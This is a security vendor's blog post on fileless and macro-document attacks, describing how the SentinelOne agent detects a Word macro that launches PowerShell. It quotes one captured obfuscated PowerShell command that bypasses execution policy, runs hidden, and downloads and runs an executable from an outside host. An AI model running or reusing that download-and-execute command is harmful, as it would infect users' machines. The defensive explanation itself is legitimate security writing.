SentinelOne H1 2018 Enterprise Risk Index Report shows fileless-based attacks rose by 94%. In a previous post, we’ve talked about what fileless malware is, how it changes the way we treat cyber threats, and how it affects the enterprise. In this post, we will cover how fileless-based attacks are detected and mitigated by the SentinelOne agent.
Traditionally, AV and other endpoint security products have focused on files (executables) to detect and prevent malware. There are several advantages to this. Files can be hashed, queried in reputation services, examined by both static analysis and machine learning, and easily excluded for false detections.
These advantages lead to a problem for attackers. The name of the game is monetary gain: threat actors aim for cost-effectiveness, seeking the highest return for the least amount of effort. Yet the rewards for creating and delivering file-based malware diminish as soon as it ends up on public feeds. If the malware’s signature is detected two days after release, the attackers ROI (return on investment) may be significantly less than expected, or even negligible.
Over the past few years, threat actors have increasingly turned to fileless malware as a highly effective alternative.
Malware Hidden in Documents are also Fileless-based Attacks
Beyond the fileless-based attack that uses system files to run malicious code, another type of attack that is common and considered fileless is malware hidden within documents. Although such data files are not allowed to run code, there are vulnerabilities in Microsoft Office and PDF readers that adversaries can exploit to obtain code execution. For example, an infected document could trigger a malicious PowerShell command. There are also a few built-in functionalities that allow code execution within documents, like macros and DDE attack.
Detection and Mitigation Walkthrough
Let’s walk through a flow where the user has received a Word document via encrypted email. The user knows the sender and, therefore, downloads the document to his Desktop and opens it. Once he opens the file, he gets the following:
Once “Yes” is clicked, the attack is rolling. Let’s see what the SentinelOne agent detects (running in Detect mode for this example).
The administrator can examine exactly how each and every element involved in this story contributed to the attack.
SentinelOne displays the exact command line invoking the PowerShell command:
-ExECUtiONpOlIcy BYpAsS -NoPROfILE -WInDOWSTYLe HIdDEN (neW-oBJeCT SysTem.NeT.weBcliENT).doWNlOADfilE('http://v32gy.worldnews932.ru/file/nit.nbv','C:\Users\admin\AppData\Roaming.exE');START-proceSS 'C:\Users\admin\AppData\Roaming.exE'
In a real-life scenario, the SentinelOne agent immediately mitigates the issue. This happens automatically, without the need for the administrator to take any action. The administrator is notified by SMS, SIEM or email.
Too many security solutions rely on a thin-layer of trust: passing over so-called reliable or reputable software to focus on unknown or untrusted files and applications. Relying on “who its from” rather than “what it’s doing” is a flawed strategy that opens the door to supply chain attacks. This is where the SentinelOne solution, based on behavioral AI detection and layered security, really shines – covering exploits, macro documents, exploit kits, PowerShell, PowerSploit, and zero day vulnerabilities locally, without impacting your employees’ day-to-day productivity.